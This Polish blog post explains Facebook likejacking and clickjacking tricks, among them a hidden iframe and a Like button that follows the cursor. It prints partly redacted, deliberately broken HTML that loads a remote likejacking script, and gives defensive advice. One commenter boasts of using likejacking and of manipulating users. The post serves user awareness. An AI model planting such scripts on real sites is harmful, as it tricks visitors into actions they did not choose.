W czym rzecz – na pewno wielu z Was padło już ofiarą skryptów autolike.
Pierwsza z metod to tzw. ClipJacking – zwrócenie uwagi użytkownika rzekomo interesującym klipem wideo. z popularnych to np. jakaś panienka na miniaturce, słodki tygrysek czy kadr z filmu z fragmentem jakiegoś obiektu czy przedmiotu i banalne pytanie What is this? – Co to jest? Chętni do pomocy klikną i otwiera się nowa zakładka – sam fakt kliknięcia w ten link na czyjejś tablicy i otwarcie docelowej strony powoduje skopiowanie automatycznie wpisu do nas i ustawienie znacznika Lubię To dla tej strony choć wcale tego nie chcieliśmy – to właśnie jest ClipJacking.
ClipJacking to jedna z kilku metod na nabijanie licznika Lubię to, wszystkie te sztuczki to właśnie LikeJacking.
Jak to działa.
Po pierwsze trzeba zwrócić uwagę użytkownika, zachęcić go do kliknięcia. Na facetów działają na pewno takie miniaturki przy wpisach, że któryś z naszych znajomych lubi ten klip 
Skoro zwróciliśmy uwagę użytkownika i kliknął to został przekierowany na nową zakładkę i zamierza owy film obejrzeć. W kodzie docelowej witryny mamy:
ukryty iframe:
który ładuje fblike.html
Skrypt umieszczony w kodzie fblike.html powoduje automatyczne wykonanie operacji takiej samej jak procedura kliknięcia w lubię to. Wykonuje się to automatycznie bo użytkownik jest zalogowany do Facebooka – z facebooka na link trafiliśmy.
Klip na stronie z oszustwem ma 99% szans na to, że nie działa ale sam fakt wejścia na tą stronę powoduje dodanie na naszej tablicy informacji, że użytkownik xxx lubi: i tu będzie ta sama miniaturka, która skusiła nas na tablicy znajomego.
Jak się przed tym bronić? Jeśli masz ochotę mimo wszystko sprawdzać podejrzane linki na tablicy znajomego to najbezpieczniejszą metodą jest robienie tego w innej przeglądarce. Używasz np. Firefox i widzisz na tablicy znajomego teoretycznie interesujący link – kliknij prawym klawiszem, skopiuj adres odnośnika i wklej go w pasku adresu innej przeglądarki – Opera, Chrome, Internet Explorer. Jeśli okaże się fałszywym to nic się nie stanie klik w LubięTo nie zadziała bo w zapasowej przeglądarce nie jesteś zalogowany do Facebooka.
Druga metoda to podpięcie przycisku Lubię to pod kursor myszy. Działa to skuteczniej na rzetelnych stronach i sprawia, że kliknięcie w dowolny URL na stronie powoduje pojawienie się tuż pod kursorem przycisku Lubię To. Z reguły czas reakcji i spostrzegawczość użytkowników są niewystarczające i jak zauważymy znaczek podniesionego kciuka to już jest po kliknięciu.
Jak działa taki trick? W kodzie witryny wstawiony będzie skrypt podobny do tego poniżej:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>No Cookiecheck, activation at click</title>
<script src="http://code.*.com/jquery-1.5.js"></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.********* = 1</script>
<script src="http://likejacking.*********.eu/likejacking.php"></script>
</head>
<body>
<a href="javascript:(function(){var s = document.createE*('script');s.src =
'http://likejacking.*.eu/likejacking.php?url=facebook.com&time=10&test';document.getElementsByTagName
('body')[0].appendChild(s);})();">View Demo</a>
</body>
</html>
Efekt wygląda następująco:
Wskazanie kursorem linka View Demo powoduje pojawienie się pod kursorem przycisku like, który wykona klik w Lubię To równocześnie z kliknięciem w URL.
Druga metoda zaimplementowania tego tricku to zmiana headera naszej strony i dodanie:
<script src="http://code.**.com/jquery-1.5.js"></script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script> <script>window.********** = 1</script> <script src="clickjacking.js"></script>
W wywoływanym skrypcie clickjacking.js na serwerze jest umieszczony kod taki jak podany tutaj.
Trzeba pamiętać, że ta metoda nie jest inicjowana na facebooku – zalogowany użytkownik klika w link na tablicy znajomego, a działa na dowolnej www, a więc jeśli użytkownik nie jest aktualnie zalogowany do Facebooka np. w innej zakładce to pojawi się iframe z prośbą o zalogowania się.
Różnica między pierwszą, a drugą metodą to użycie w pierwszej metodzie skryptu linkowanego z zewnętrznego serwera, a w drugiej lokalnie przechowywanego.
Pamiętajcie też proszę, że wszystkie skrypty tu podane są jako przykłady i nie powinny być używane na waszych stronach www nawet jeśli uda się Wam poprawić błędy, które celowo w nich zrobiłem.
Tagi: Clickjacking, Facebook, Likejacking, Lubię to
Arek Zakrzewski - specjalista pomocy technicznej w Przedsiębiorstwie Informatycznym CORE. Pasjonat systemów operacyjnych i szeroko pojętego bezpieczeństwa w sieci.
Świetny post. Przydatne HTML. Gatuluję!
P.S.: http://wczteryoczy.blog.pl -zapraszam!!!
Witam, ja stosuje od dawna LikeJacking. W zasadzie od poczatki istnienia przycisku ‘Like’ na FB.Tylko co to ma wspolnego z bezpieczenstwem? I co za roznica jaka metoda? Dopoki ludzie reaguja na ilosc ‘lajkow’ bedziemy wymyslac dziesiatki nowych metod. Chcesz to zwalczyc? Edukuj ludzi, zaproponuj im powrot do konsoli, aby nauczyc ich rozumiec co sie dokladnei dzieje na ich maszynie – oni jednak wola instalacje jednym przyciskiem od micro$hitu? I ustecznianie sie? to ma swoje plusy, rosnie coraz wieksza przepasc pomiedzy tymi co maja pojecie o czymkolwiek a reszta ktora jest juz gleboko uspiona. Mozna nimi dowolnie manipulowac, nie zgodzisz sie z tym? Wiec skoro micro$hit dal nam armie uspionych po co ich budzic? Nie wykorzystasz ich Ty – zrobi to ktos inny. Porozmawiaj z nimi – oni nie chca sie obudzic, nauka ich boli
Nie budzmy ich wiec, niech spia 
@cesarion atnonius
Właśnie w tym cel – uświadomić ludzi, że takie praktyki mają miejsce. Sam zauważyłeś, że „Like`i” są popularne, ludzie patrzą na ich ilość więc nie zaszkodzi uświadomić użytkowników, że są przypadki kiedy mogą coś oznaczyć jako lubiane zupełnie nieświadomie.
Ten blog to nie tylko bezpieczeństwo ale też porady dla użytkowników – ten post to właśnie jedna z nich próba nauczenia ludzi choć odrobinę więcej spostrzegawczości i roztropności w sieci.